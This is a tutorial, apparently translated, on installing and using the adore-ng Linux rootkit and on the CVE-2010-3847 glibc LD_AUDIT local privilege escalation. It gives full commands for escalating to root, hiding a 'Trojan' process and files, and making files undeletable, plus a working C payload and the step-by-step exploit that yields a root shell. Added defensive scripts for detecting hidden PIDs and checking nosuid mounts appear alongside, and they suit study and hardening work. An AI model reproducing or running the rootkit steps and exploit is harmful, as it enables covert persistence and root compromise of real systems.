Official website: https://github.com/trimpsyw/adore-ng
Installation (the kernel-devel package must match the running kernel, here 2.6.32-220.el6.x86_64, or the module will neither build nor load):
[root@host ~]# unzip adore-ng-master.zip
[root@host ~]# cd adore-ng-master
[root@host adore-ng-master]# rpm -ivh /mnt/packages/kernel-devel-2.6.32-220.el6.x86_64.rpm
[root@host adore-ng-master]# yum install gcc*
[root@host adore-ng-master]# make
[root@host adore-ng-master]# insmod adore-ng.ko # load the module
Test: view the help:
[root@host adore-ng-master]# ./ava -h
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]
I print info (secret UID etc)
h hide file # hide a file
u unhide file
r execute as root # privilege escalation: run a program as root
R remove PID forever
U uninstall adore
i make PID invisible # hide a process, e.g. your Trojan program
v make PID visible
The letters are case-sensitive: I prints info while i hides a PID, r runs a program as root while R kills a PID, and u unhides a file while U unloads the rootkit.
Test: prepare the environment by creating an ordinary user. Then, as that user, use the ava command to run a process as root.
Privilege escalation: raise your own permissions on the server.
[root@host ~]# useradd tree
[root@host ~]# echo 123456 | passwd --stdin tree
Changing password for user tree.
passwd: all authentication tokens updated successfully.
Example 1: privilege escalation through the ava command. Let the ordinary user tree obtain root privileges.
[root@host ~]# cp -r /root/adore-ng-master /tmp/
[root@host ~]# chmod 777 /tmp/adore-ng-master/ -R
[root@host adore-ng-master]# ssh tree@host # log in with the ordinary account
[tree@host ~]$ cd /tmp/adore-ng-master/
[tree@host adore-ng-master]$ pwd
/tmp/adore-ng-master
[tree@host adore-ng-master]$ ./ava I # view basic information; this output means the module is loaded and ava can talk to it
56,500,500,56
Adore 1.56 installed. Goodluck.
elite_uid:2618748389,elite_gid=4063569279, ADORE_KEY=FGJGGGFD current_adore=56
In practice, the r option: execute as root (run a program with root identity).
[tree@host adore-ng-master]$ ll /etc/shadow
---------- 1 root root 1071 Apr 7 10:17 /etc/shadow
[tree@host adore-ng-master]$ vim /etc/shadow # as tree this is refused: the file grants no permission bits to anyone but root
[tree@host adore-ng-master]$ ./ava r vim /etc/shadow # now the file opens writable; type something and save to test that writes go through
To verify that the modification took effect:
[root@host ~]# vim /etc/shadow
In addition, check the identity of that process from another terminal:
[root@host ~]# ps -axu | grep shadow
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/faq
root 6874 0.1 0.1 10216 2924 pts/3 S+ 04:12 0:00 /usr/bin/vim /etc/shadow
root 6879 0.0 0.0 4024 692 pts/2 S+ 04:12 0:00 grep shadow
The vim that tree started is running as root. (The procps warning only complains about BSD-style options written with a dash; ps aux gives the same listing without it.)
Leave a back door that nobody can see?
Example 2: hide a process (hide your Trojan program).
Simulate a Trojan program:
[tree@host adore-ng-master]$ cat a.sh
#!/bin/bash
sleep 2000
[tree@host adore-ng-master]$ chmod +x a.sh
[tree@host adore-ng-master]$ ./a.sh &
View it:
[root@host ~]# ps -axu | grep a.sh
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/faq
tree 6339 0.0 0.1 106148 1184 pts/3 S 10:32 0:00 /bin/bash ./a.sh
Hide the process:
[tree@host adore-ng-master]$ ./ava i 6339 # make PID 6339 invisible
56,500,500,56
Adore 1.56 installed. Goodluck.
Made PID 6339 invisible.
[root@host ~]# ps -axu | grep a.sh # check again: only the grep itself shows up
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/faq
root 10225 0.0 0.0 103300 852 pts/4 S+ 22:54 0:54 grep a.sh
The process keeps running (the sleep continues); ps no longer lists it because the module filters the /proc directory listing that ps reads.
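The hiding shown above works by filtering directory listings of /proc, which is all that ps and top read. The script below is an added example (not part of adore-ng or of the original page) of the check a responder would run on such a box: it probes /proc/<pid>/status for every PID directly, which a readdir hook cannot refuse, and reports PIDs that answer but are missing from the listing. It assumes Linux with /proc mounted; the range cap of 65536 and the function names are this example's own choices. Thread IDs also have /proc entries that never appear in a listing, so each hit is checked against its Tgid line to avoid false positives.

```shell
#!/bin/sh
# Added example, not adore-ng code: detect PIDs hidden from ps by a /proc
# directory-listing hook. Assumes Linux with /proc mounted.

# PIDs that a directory listing of /proc reports; this is all ps ever sees.
listed_pids() {
    ls /proc 2>/dev/null | grep -E '^[0-9]+$'
    return 0
}

# PIDs found by looking up /proc/<pid>/status directly for 1..$1. No readdir()
# is involved, so a hooked listing cannot filter them. Entries whose Tgid differs
# from the PID are threads, which are legitimately absent from the listing.
probed_pids() {
    pid=1
    while [ "$pid" -le "$1" ]; do
        if [ -e "/proc/$pid/status" ] &&
           [ "$(awk '/^Tgid:/ { print $2 }' "/proc/$pid/status" 2>/dev/null)" = "$pid" ]; then
            echo "$pid"
        fi
        pid=$((pid + 1))
    done
    return 0
}

# Print the entries of the second newline-separated list that are absent from
# the first. Both lists hold unique entries, so after emitting the first list
# twice and the second once, uniq -u keeps exactly the lines found only in the
# second list.
only_in_second() {
    { printf '%s\n' "$1"; printf '%s\n' "$1"; printf '%s\n' "$2"; } \
        | grep -v '^$' | sort | uniq -u
    return 0
}

# Hidden PIDs in 1..$1 (default 65536; pass $(cat /proc/sys/kernel/pid_max) for
# a full sweep, which takes longer). Every candidate is re-checked so a process
# that merely started or exited between the two scans is not reported.
hidden_pids() {
    max=${1:-65536}
    listed=$(listed_pids | awk -v m="$max" '$1 <= m')
    probed=$(probed_pids "$max")
    for candidate in $(only_in_second "$listed" "$probed"); do
        if [ -e "/proc/$candidate/status" ] && ! listed_pids | grep -qx "$candidate"; then
            echo "$candidate"
        fi
    done
    return 0
}

# Run as root for a complete view. Inspect each hit with
#   cat /proc/<pid>/cmdline; ls -l /proc/<pid>/exe
hidden_pids "$@"
```

A rootkit that also hooks the /proc lookup path, rather than only the directory listing, defeats this probe, so treat a clean result as one signal rather than proof; the unhide tool applies several such comparisons (brute force, /proc versus /sys, syscall versus procfs) and is the usual next step.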
Example 3: hide files
[tree@host adore-ng-master]$ mkdir test
[tree@host adore-ng-master]$ cd test/
[tree@host test]$ echo AAAA > a.php
[tree@host test]$ ls -a
. .. a.php
Hide the file:
[tree@host test]$ /tmp/adore-ng-master/ava h a.php
56,500,500,56
Adore 1.56 installed. Goodluck.
File 'a.php' is now hidden.
View:
[tree@host test]$ ls -a
. ..
[tree@host test]$ cat a.php # the file is still there and still readable by its exact name; only directory listings omit it
AAAA
Try: find recently modified files
[tree@host test]$ touch b.php
[tree@host test]$ ls
b.php
[tree@host test]$ find ./ -mtime -2
./
./b.php # a.php is not found either
Is there any way to list a.php? No, not while the rootkit is loaded: everything that enumerates the directory (ls, find, tab completion, backup tools) goes through the same hooked listing. Only opening it by name works.
To restore it:
[tree@host test]$ /tmp/adore-ng-master/ava u a.php
56,500,500,56
Adore 1.56 installed. Goodluck.
File 'a.php' is now visible.
[tree@host test]$ ls -a
. .. a.php
Summary:
1. Privilege escalation through the rootkit
2. Hiding the Trojan's process ID through the rootkit
3. Hiding Trojan files through the rootkit
Create a Trojan file that even the root user cannot delete: set the immutable attribute with chattr +i b.txt. While the i flag is set, rm fails with "Operation not permitted" even for root; the flag has to be cleared first, which is why lsattr belongs in any cleanup:
[root@host ~]# lsattr b.txt
----i--------e- b.txt
[root@host ~]# chattr -i b.txt
[root@host ~]# rm -rf b.txt
Part 2: privilege escalation by an ordinary Linux user
Privilege escalation: elevate from a normal user to root.
Note: the following vulnerability exists on RHEL5 through RHEL6.0, both 32-bit and 64-bit.
It exploits a flaw in the glibc dynamic loader ld.so (CVE-2010-3847). For setuid programs ld.so refuses LD_AUDIT entries that contain a slash, but the literal string $ORIGIN contains none, passed that check, and was then expanded to the directory of the running executable, which ld.so reads from /proc/self/exe. The steps below arrange for that directory path, /tmp/exploit, to be a file the attacker wrote: a hard link to a setuid binary is created as /tmp/exploit/target, the directory is deleted while a descriptor to the link stays open, and a shared object is compiled to /tmp/exploit. ld.so then loads the attacker's library into a root-owned process and runs its constructor.
Log in as a normal user:
[root@host ~]# su - mk
[mk@host ~]$
SUID: when a user executes command A that carries the setuid bit, the command runs with the identity of A's owner (root, for /bin/ping).
[mk@host ~]$ cd /tmp/
[mk@host tmp]$ ls -ld /tmp/
drwxrwxrwt root root 4096 10-14 21:29 /tmp/
[mk@host tmp]$ mkdir exploit # create a directory anywhere under /tmp; the name matters, because the payload is written to this same path later
[mk@host tmp]$ ll /bin/ping
-rwsr-xr-x 1 root root 35832 Apr 2009 /bin/ping
[mk@host tmp]$ ln /bin/ping /tmp/exploit/target # hard link to /bin/ping (any name); the link shares the inode, so it keeps root ownership and the setuid bit, which a copy would lose
[mk@host tmp]$ exec 3< /tmp/exploit/target # keep a descriptor open so the binary stays reachable after the link is removed
[mk@host tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[mk@host tmp]$ rm -fr /tmp/exploit/ # remove the directory so that /tmp/exploit can be recreated as a file
[mk@host tmp]$ ls -l /proc/$$/fd/3 # the link shows as deleted, but fd 3 still refers to the setuid binary
lr-x------ 1 hello hello 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[mk@host tmp]$ cat payload.c # the C payload: a constructor runs as soon as the shared object is loaded into the setuid process
#include <stdlib.h>
#include <unistd.h>

/* Runs at load time inside ping, where the effective UID is already 0.
 * setuid(0) also sets the real UID, so the bash it starts does not drop
 * privileges (bash resets euid to the real uid when they differ). */
void __attribute__((constructor)) init(void)
{
    setuid(0);
    system("/bin/bash");
}
[mk@host tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c # compile it as a shared object at the path $ORIGIN will expand to
[mk@host tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[mk@host tmp]$ whoami
mk
[mk@host tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 # ld.so derives $ORIGIN from the deleted path /tmp/exploit/target, i.e. /tmp/exploit, and loads that file as the audit library
[mk@host tmp]# whoami
root
On RHEL 6.1, whose glibc is patched, the preceding commands all succeed but the last one prints the error below, and the user is simply logged out: exec replaced the login shell with ping, which prints its usage and exits, so the session ends.
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Workaround:
You can contain the risk by remounting world-writable (777) directories such as /tmp with nosuid, so the kernel ignores the setuid bit on anything executed from there, the hard-linked ping included:
[root@host ~]# mount -o bind,nosuid /tmp /tmp
Ordinary users' home directories need the same treatment, since a user can create the hard link there just as well:
[root@host ~]# mount -o bind,nosuid /home/mk /home/mk
Confirm with "grep ' /tmp ' /proc/mounts" that nosuid really appears in the options (some util-linux versions ignore options given together with bind and need a separate "mount -o remount,bind,nosuid /tmp /tmp"), and put nosuid in /etc/fstab so it survives a reboot.
No change is needed if the ln command already fails like this:
[root@host ~]# su - mk
[mk@host ~]$ ln /bin/ping /tmp/ping
ln: creating hard link `/tmp/ping' => `/bin/ping': Invalid cross-device link
# error while creating the hard link: invalid cross-device link
A hard link cannot cross filesystems, so when /tmp is a separate filesystem from /bin the setuid binary cannot be relinked into it at all. The real fix is the updated glibc; the mount options only block this particular delivery, and on kernels 3.6 and later fs.protected_hardlinks=1 stops an unprivileged user from hard-linking files it does not own in the first place.
Note: find directories whose permission bits are all set (777):
[root@host ~]# find / -perm -777 -type d
/var/tmp
/dev/.mdadm
/dev/.udev
/dev/.udev/rules.d
/dev/shm
find: `/proc/9346/task/9346/fd/5': No such file or directory
find: `/proc/9346/task/9346/fdinfo/5': No such file or directory
find: `/proc/9346/fd/5': No such file or directory
find: `/proc/9346/fdinfo/5': No such file or directory
/tmp
/tmp/vmwarednd
/tmp/.ICE-unix
/tmp/.X11-unix
(The /proc errors are find's own descriptors vanishing as it walks /proc; "find / -path /proc -prune -o -perm -777 -type d -print" skips them.)
Add each ordinary user's home directory, /home/<user>, which that user can write to even though it is not 777.
Note on -perm:
-perm mode: the permission bits match mode exactly
-perm +mode: any of the bits in mode is set (old GNU syntax; newer find spells it -perm /mode)
-perm -mode: all of the bits in mode are set
So -perm -777 above only finds directories that are readable, writable and executable by everyone; to catch every world-writable directory, use -perm -o+w (or -perm -2).
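The workaround above only helps if the mount that actually contains a writable directory carries nosuid, which "find -perm" alone does not tell you. The script below is an added example, not from the original page: it parses the /proc/self/mountinfo format to find the mount that holds a given path (longest mount-point prefix wins, as in the kernel's own lookup) and reports world-writable directories that are not on a nosuid mount. The mountinfo table embedded at the bottom is constructed for the demonstration, and the function names are this example's own.

```shell
#!/bin/sh
# Added example: is a world-writable directory on a nosuid mount?
# /proc/self/mountinfo fields: id parent major:minor root mountpoint options
# [optional fields] - fstype source superopts. Field 6 holds the per-mount
# options, which is where a "mount -o bind,nosuid" remount shows up.

# Print the options of the mount containing PATH ($1) from MOUNTINFO text ($2).
mount_opts_for() {
    printf '%s\n' "$2" | awk -v p="$1" '
        {
            mp = $5; opts = $6
            if (mp == "/") prefix = "/"; else prefix = mp "/"
            # PATH is on this mount if it equals the mount point or lies below it;
            # keep the deepest such mount point.
            if (p == mp || index(p, prefix) == 1) {
                if (length(mp) > length(best)) { best = mp; best_opts = opts }
            }
        }
        END { print best_opts }'
}

# Succeed when PATH ($1) lives on a nosuid mount according to MOUNTINFO ($2).
has_nosuid() {
    case ",$(mount_opts_for "$1" "$2")," in
        *,nosuid,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Live check: every world-writable directory whose mount lacks nosuid.
# Run as root; /proc is pruned so find does not chase its own descriptors.
unprotected_world_writable_dirs() {
    mountinfo=$(cat /proc/self/mountinfo)
    find / -path /proc -prune -o -type d -perm -o+w -print 2>/dev/null |
    while read -r dir; do
        has_nosuid "$dir" "$mountinfo" || echo "$dir"
    done
    return 0
}

# Constructed sample table: /tmp remounted nosuid, /home still a plain mount.
SAMPLE_MOUNTINFO='22 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw
40 22 0:30 / /tmp rw,nosuid,nodev,relatime - tmpfs tmpfs rw
41 22 8:1 /home /home rw,relatime - ext4 /dev/sda1 rw'

has_nosuid /tmp/exploit "$SAMPLE_MOUNTINFO" &&
    echo "/tmp/exploit: nosuid mount, a hard-linked ping would not run setuid"
has_nosuid /home/mk "$SAMPLE_MOUNTINFO" ||
    echo "/home/mk: no nosuid, a same-filesystem hard link of /bin/ping stays setuid"
```

Mount points containing spaces appear in mountinfo escaped as \040, which this parser does not decode; such paths are rare for system mounts but worth knowing about when the output looks incomplete.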
Adore-ng notes and Linux ordinary-user privilege escalation